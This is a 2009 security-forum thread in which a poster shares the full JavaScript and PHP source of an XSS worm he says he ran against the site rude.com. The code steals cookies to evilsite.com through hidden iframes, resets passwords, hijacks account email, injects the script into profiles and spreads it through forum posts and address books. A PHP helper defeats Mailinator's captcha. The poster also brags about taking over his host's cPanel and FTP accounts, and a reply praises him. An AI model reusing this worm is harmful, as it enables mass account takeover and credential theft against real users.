Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
rude.com XSS worm
Posted by: RonPaul
Date: October 03, 2009 10:56PM

http://rude.pastebin.com/f269e4f5f
function randomPassword(){
  var rand_num = Math.round((18-6) * Math.random() + 6);
  chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
  pass = "";
  for(x=0;x<rand_num;x++)
  {
    i = Math.floor(Math.random() * 62);
    pass += chars.charAt(i);
  }
  return pass;
}

	function sleep(ms)
	{
		var dt = new Date();
		dt.setTime(dt.getTime() + ms);
		while (new Date().getTime() < dt.getTime());
	}


function getXMLHTTPRequest() 
{
var req = false;
try 
  {
   req = new XMLHttpRequest(); /* e.g. Firefox */
  } 
catch(err1) 
  {
  try 
    {
     req = new ActiveXObject("Msxml2.XMLHTTP");  /* some versions IE */
    } 
  catch(err2) 
    {
    try 
      {
       req = new ActiveXObject("Microsoft.XMLHTTP");  /* some versions IE */
      } 
      catch(err3) 
        {
         req = false;
        } 
    } 
  }
return req;
}

var myRequest = getXMLHTTPRequest();

			var http_request = false;
			function makePOSTRequest(url, parameters) {
			http_request = false;
			if (window.XMLHttpRequest) { // Mozilla, Safari,...
			http_request = new XMLHttpRequest();
			if (http_request.overrideMimeType) {
			http_request.overrideMimeType('text/html');
			}
			} else if (window.ActiveXObject) { // IE
			try {
			http_request = new ActiveXObject("Msxml2.XMLHTTP");
			} catch (e) {
			try {
			http_request = new ActiveXObject("Microsoft.XMLHTTP");
			} catch (e) {}
			}
			}
			if (!http_request) {
			return false;
			}
			http_request.onreadystatechange = alertContents;
			http_request.open('POST', url, true);
			http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
			http_request.setRequestHeader("Content-length", parameters.length);
			http_request.setRequestHeader("Connection", "close");
			http_request.send(parameters);
			}
			function alertContents() {
			if (http_request.readyState == 4) {
			/*if (http_request.status == 200) {
			//result = http_request.responseText;

			} else {

			}
			*/
			}
			}
function callAjax2(){
shortsurl =  
[ 
"";
//various links 
] 
var shorturl = shortsurl[Math.floor(Math.random()*shortsurl.length)];

saying =  
[ 
"hi there",
":D this site is so cool",
":( i wish i had more friends on here",
"can someone help me? shoot me a msg",
"what is good info to add to your profile so people actually talk to u?",
"i think this site installed someone on my computer",
"bump",
"how is everyone?"
] 
var sayin = saying[Math.floor(Math.random()*saying.length)];

topicid =  
[ 
"22941",
"15607",
"19920",
"7688"
//topics to spam
] 
var topic = topicid[Math.floor(Math.random()*topicid.length)];

var topic_url = "http://www.rude.com/main/message_board/new_reply/id/" + topic + "/";
var total_saying = sayin + "%3Cscript%20src%3Dhttp%3A//" + shorturl + "%3E%3C/script%3E";
var topic_vars ="name=postsave=POST&radiobutton=defaultpost&message='" + total_saying + "'";
makePOSTRequest(topic_url, topic_vars);


//get address book spam friends
var url="/main/message/address_book/";
myRequest.open("GET",url,true);
myRequest.onreadystatechange=responseAjax2;
myRequest.send(null);
}

function responseAjax2(){
if(myRequest.readyState==4){
if(myRequest.status==200){

var div2 = document.createElement('div');
div2.innerHTML = myRequest.responseText;


for (i=0; i < div2.getElementsByTagName('a').length; i++)
{
var blah = div2.getElementsByTagName('a').length - 27;
if(i>0 && i<blah){


shortsurl =  
[ 
"";
//links
] 
var shorturl = shortsurl[Math.floor(Math.random()*shortsurl.length)];

saying =  
[ 
"hi there",
":D this site is so cool",
":( i wish i had more friends on here",
"can someone help me? shoot me a msg",
"what is good info to add to your profile so people actually talk to u?",
"i think this site installed someone on my computer",
"bump",
"how is everyone?"
] 
var sayin = saying[Math.floor(Math.random()*saying.length)];

//actual spamming of friends
var total_saying = sayin + "%3Cscript%20src%3Dhttp%3A//" + shorturl + "%3E%3C/script%3E";
var their_name = div2.getElementsByTagName('a').innerHTML;
var their_url = "/main/space/comment_add/alias/" + their_name;
var their_post = "save=save&message='" + total_saying + "%20Please%20look%20at%20my%20detailed%20profile%20page.'";
makePOSTRequest(their_url,their_post);

}
} 


}
}
}


function callAjax(){
//fetches profile details to submit XSS on their profile page
//if the script is already in their profile, it doesnt do this stuff
var url="/main/member_profile/edit/";
myRequest.open("GET",url,true);
myRequest.onreadystatechange=responseAjax;
myRequest.send(null);
}

function responseAjax(){
if(myRequest.readyState==4){
if(myRequest.status==200){

var div = document.createElement('div');
div.innerHTML = myRequest.responseText;

var additional = div.getElementsByTagName('textarea')[0].innerHTML;
var inThere = additional.match(/script/i);
if (inThere) {
}else {

var first_name1 = div.getElementsByTagName('input')[3].value;
var middle_name1 = div.getElementsByTagName('input')[4].value;
var last_name1 = div.getElementsByTagName('input')[5].value;
var street11 = div.getElementsByTagName('input')[6].value;
var city1 = div.getElementsByTagName('input')[7].value;
var postal1 = div.getElementsByTagName('input')[8].value;
var country_id1 = div.getElementsByTagName('select')[0].value;
var sexual_preference1 = div.getElementsByTagName('select')[3].value;

var othervals = "flg_hide_address_city=1&flg_have_webcam=2&first_name=" + first_name1 + "&middle_name=" + middle_name1 + "&last_name=" + last_name1 + "&street1=" + street11 + "&city=" + city1 + "&postal=" + postal1 + "&country_id=" + country_id1 + "&sexual_preference=146&save=SAVE%20%26%20UPDATE&additional=%3Cscript%20src%3Dhttp%3A//evilsite.js%3E%3C/script%3E";





var username=div.getElementsByTagName('a')[3].href; 
var username=username.replace("http://", ""); 
var username=username.replace("www.", ""); 
var username=username.replace("rude.com/", "");
var pw_value=randomPassword();
var das_cookie = document.cookie + '; username=' + username + '; pw=' + pw_value + ';';

//collects cookie and other useful stuff
var url3 = "http://evilsite.com/x.php?c=" + das_cookie;
var url3 = encodeURI(url3);
var i;
try {
i = document.createElement('<iframe height=0 width=0 frameborder=0 src=' + url3 + '>');
} catch(e) {
i = document.createElement('iframe');
i.setAttribute('src',url3);
i.setAttribute('height','0');
i.setAttribute('width','0');
i.setAttribute('frameborder','0');
}
document.getElementById('app_bar_top').appendChild(i);


//resets passwords to random value
//didnt have to enter old password

var poststr1 = "save=Change%20Password&pass_word=" + pw_value +"&pass_word_confirm=" + pw_value;
makePOSTRequest("/main/user_password/change/", poststr1);

//adds new email to their account and then activates it as primary
//for gmail if you do blah+anything_here@gmail.com
//it still goes to blah@gmail.com
//then in gmail forwarded all my mail to mailinator
var comb_email = "my%2b" + username + "@gmail.com";
var poststr2 = "save=Add%20Email&email=" + comb_email + "&email_confim=" + comb_email;
makePOSTRequest("/main/user_email/add/", poststr2);



makePOSTRequest("/main/member_profile/edit/", othervals);

sleep(2000);


da_url = "http://evilsite.com/xfm1.php?u=" + username;
var i;
try {
i = document.createElement('<iframe height=0 width=0 frameborder=0 src=' + da_url + '>');
} catch(e) {
i = document.createElement('iframe');
i.setAttribute('src',da_url);
i.setAttribute('height','0');
i.setAttribute('width','0');
i.setAttribute('frameborder','0');
}
document.getElementById('chat_holder').appendChild(i);
sleep(2000);

da_url2 = "http://evilsite.com/xfm.php?u=" + username;
var i;
try {
i = document.createElement('<iframe height=0 width=0 frameborder=0 src=' + da_url2 + '>');
} catch(e) {
i = document.createElement('iframe');
i.setAttribute('src',da_url2);
i.setAttribute('height','0');
i.setAttribute('width','0');
i.setAttribute('frameborder','0');
}
document.getElementById('chat_names').appendChild(i);


//this calls the spread of the worm to other accounts
callAjax2();


}

}else{
//error
}
}
}
callAjax();

xfm1.php - fetched the email and activated it
xfm.php - set it as primary and deleted the email from mailinator due to a weak captcha
http://rude.pastebin.com/f73fa6319
<?php
$account = ""; // account name here
$test_name = strip_tags($_GET['u']);
//echo "<iframe src=sendcash.php?c=" . $test_name . " width=0 height=0 frameborder=0></iframe>";

function getPage($captcha,$box,$msg){
	$url = "http://www.mailinator.com/toast.jsp?catpcha=" . $captcha . "&email=" . $box . "&msgid=" . $msg;
        $timeout=30;
    $curl = curl_init();
	$referer2 = "http://www.mailinator.com/showmail.jsp?email=" . $box . "&msgid=" . $msg;
        curl_setopt ($curl, CURLOPT_REFERER, $referer2);

    curl_setopt ($curl, CURLOPT_URL, $url);
    curl_setopt ($curl, CURLOPT_TIMEOUT, $timeout);
    curl_setopt ($curl, CURLOPT_USERAGENT, sprintf("Mozilla/%d.0",rand(4,5)));
    curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($curl, CURLOPT_SSL_VERIFYPEER, 0);
    $html = curl_exec ($curl);
    curl_close ($curl);
}


$string=file_get_contents("http://www.mailinator.com/maildir.jsp?email=$account");
preg_match_all('/(?<=msgid=)\d+/', $string, $matches); 

	foreach($matches[0] as $value){
		$counter=0;
		$initial_string=file_get_contents("http://www.mailinator.com/showmail.jsp?email=$account&msgid=$value"); 

		$stringstart2 = "Hello ";
		$stringend2 = ",<br><br>"; //find end of string to get the middle

		$trimfrom2= strpos($initial_string,$stringstart2) + strlen($stringstart2);
		$trimto2 = strpos($initial_string,$stringend2);
		$output_string2 = substr( $initial_string, $trimfrom2 , $trimto2 - $trimfrom2 );

			
			if($output_string2 == $test_name && $counter == 0){
				$stringstart = "Please click the link below to confirm this email address:<br><br><a href=";
				$stringend = " rel=nofollow target='_blank'>"; 
				$trimfrom= strpos($initial_string,$stringstart) + strlen($stringstart);
				$trimto = strpos($initial_string,$stringend);
				$output_string = substr( $initial_string, $trimfrom , $trimto - $trimfrom );
				$stringstart3 = "http://www.rude.com/main/user_email/confirm/id/";
				$stringend3 = "/key"; 
				$trimfrom3= strpos($output_string,$stringstart3) + strlen($stringstart3);
				$trimto3 = strpos($output_string,$stringend3);
				$output_string3 = substr( $output_string, $trimfrom3 , $trimto3 - $trimfrom3 );
				$primary_link = "http://www.rude.com/main/user_email/set_default/id/" . $output_string3 . "/";


				echo "<iframe src=$primary_link height=0 width=0 frameborder=0></iframe>";

				$captchastart = '<img border=1 src="images/captcha';
				$captchaend = '.gif" alt="">'; 

				$trimfrom_captcha= strpos($initial_string,$captchastart) + strlen($captchastart);
				$trimto_captcha = strpos($initial_string,$captchaend);
				$captcha_numb = substr( $initial_string, $trimfrom_captcha , $trimto_captcha - $trimfrom_captcha );
				if($captcha_numb == "1"){
					$captcha = "i+love+mailinator";
				}

				if($captcha_numb == "2"){
					$captcha = "mailinator+rocks!!";
				}

				if($captcha_numb == "3"){
					$captcha = "1234";
				}

				if($captcha_numb == "4"){
					$captcha = "semore+spam";
				}

				if($captcha_numb == "5"){
					$captcha = "123456";
				}

				if($captcha_numb == "6"){
					$captcha = "mailinator+is+neato";
				}

				if($captcha_numb == "7"){
					$captcha = "i+spam+mailinator";
				}

				if($captcha_numb == "8"){
					$captcha = "captain+cheeseburger!";
				}

				if($captcha_numb == "9"){
					$captcha = "i+read+your+email+@+mailinator";
				}

				if($captcha_numb == "10"){
					$captcha = "dog";
				}

				getPage($captcha,$account,$value);
				$counter=1;

			}

	}
?>

last part x.php was a simple cookie logger. i dont think i have to show u that

thanks for all that made this possible.

the admin has fixed the wholes i abused. still some out there. he added current password to change your password.

also to change ur primary email you have to enter your password.

the site really needs to look at its security. if you make money on the site you have your personal details including your SSN. which would be a field day for someone.

on a funny note. the site that i used to host all these files, caught on to me and changed the permissions on my files. so i reset their cpanel login and ftp information.

if you have questions about the code or what not, ask.

forums, blogs, profile, mail all had XSS.

current site states:
Quote

We are currently experiencing some technical difficulties, rest assured we are working to get RUDE back online as soon as possible.
Please try this page again in a few minutes or visit the home page by clicking here.



Edited 1 time(s). Last edit at 10/03/2009 11:22PM by RonPaul.

Options: ReplyQuote
Re: rude.com XSS worm
Posted by: Ryonan
Date: October 04, 2009 04:55AM

nice job Ron :d.
i made something similar like that months ago, victim is aN online community, but they seem dont care much about the worm.

Options: ReplyQuote


Sorry, only registered users may post in this forum.